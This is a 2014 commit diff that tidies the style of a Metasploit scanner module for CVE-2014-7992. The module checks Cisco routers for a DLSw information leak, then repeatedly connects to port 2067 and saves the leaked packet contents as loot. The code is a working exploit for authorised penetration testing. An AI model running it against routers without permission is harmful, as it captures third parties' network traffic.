Minor Ruby style and module usability cleanup

jhart-r7 · jhart-r7 · commit 7d6e7a6bfa14 · 2014-11-18T16:33:05.000-08:00
diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb
@@ -7,78 +7,86 @@
 require 'socket'
 
 class Metasploit3 < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
   def initialize
     super(
-      'Name'           => 'Cisco DLSw information leak',
-      'Description'    => %q{
-       This module implements the DLSw information leak retrieval. There is 
-       a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
-       that allows an unuthenticated remote attacker to retrieve the partial
-       contents of packets traversing a Cisco router with DLSw configured 
-       and active.  
-      },
+      'Name'           => 'Cisco DLSw Information Leak Scanner',
+      'Description'    => %q(
+        This module implements the DLSw information leak retrieval. There is
+        a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
+        that allows an unuthenticated remote attacker to retrieve the partial
+        contents of packets traversing a Cisco router with DLSw configured
+        and active.
+      ),
       'Author'         => [
         'Tate Hansen', # Vulnerability discovery
         'John McLeod', # Vulnerability discovery
-        'Kyle Rainey', # Built lab to recreate vulnerability and help test  
+        'Kyle Rainey' # Built lab to recreate vulnerability and help test
       ],
       'References'     =>
         [
           ['CVE', '2014-7992'],
-          ['URL', 'https://github.com/tatehansen/dlsw_exploit'],
+          ['URL', 'https://github.com/tatehansen/dlsw_exploit']
         ],
       'DisclosureDate' => 'Nov 17 2014',
-      'License'        => MSF_LICENSE,
+      'License'        => MSF_LICENSE
     )
 
     register_options(
       [
         Opt::RPORT(2067),
-        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024]),
+        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])
       ], self.class)
   end
 
   # Called when using check
   def check_host(ip)
-    print_status "Checking #{ip}:#{rport} for DLSw exposure"
-    connect
-    response = sock.recv(1024)
-    disconnect
+    peer = "#{ip}:#{rport}"
+    print_status("Checking #{peer} for DLSw exposure")
+    response = get_response
 
-    if (response.length > 0) && (response =~ /IOS Software|cisco.com/)
-     print_status("The target Cisco router appears vulnerable, we detected parts of a Cisco IOS banner string emitted from #{ip}:#{rport}")
-     report_vuln({
-        :host => rhost,
-        :port => rport,
-        :name => self.name,
-        :refs => self.references,
-        :info => "Module #{self.fullname} collected #{response.length} bytes"
-      })
+    if !response.blank? && (response =~ /IOS Software|cisco.com/)
+      print_good("#{peer}: The target Cisco router appears vulnerable: parts of a Cisco IOS banner detected")
+      report_vuln(
+        host: rhost,
+        port: rport,
+        name: name,
+        refs: references,
+        info: "Module #{fullname} collected #{response.length} bytes"
+      )
       Exploit::CheckCode::Vulnerable
     else
+      if response.blank?
+        vprint_status("#{peer}: no response")
+      else
+        vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
+      end
       Exploit::CheckCode::Safe
     end
   end
 
+  def get_response(size = 1024)
+    connect
+    response = sock.recv(size)
+    disconnect
+    response
+  end
+
   # Main method
   def run_host(ip)
     return unless check_host(ip) == Exploit::CheckCode::Vulnerable
 
-    print_status("Going to run until we retrieve #{datastore['LEAK_AMOUNT']} bytes from #{ip}:#{rport}")
+    print_status("#{ip}:#{rport} Waiting for #{datastore['LEAK_AMOUNT']} bytes of leaked data")
 
-    dlsw_data = ""
+    dlsw_data = ''
     until dlsw_data.length > datastore['LEAK_AMOUNT']
-      connect
-      response = sock.recv(72)
-      if response
+      response = get_response
+      unless response.blank?
         dlsw_data << response[18..72] # range of the leaked packet contents
       end
-      disconnect
     end
     loot_and_report(dlsw_data)
   end
@@ -92,8 +100,6 @@ def loot_and_report(dlsw_data)
       'DLSw_leaked_data',
       'DLSw packet memory leak'
     )
-    print_status("DLSw leaked data from #{ip}:#{rport} stored in #{path}")
+    print_status("#{ip}:#{rport}: DLSw leaked data stored in #{path}")
   end
 end
-
-   
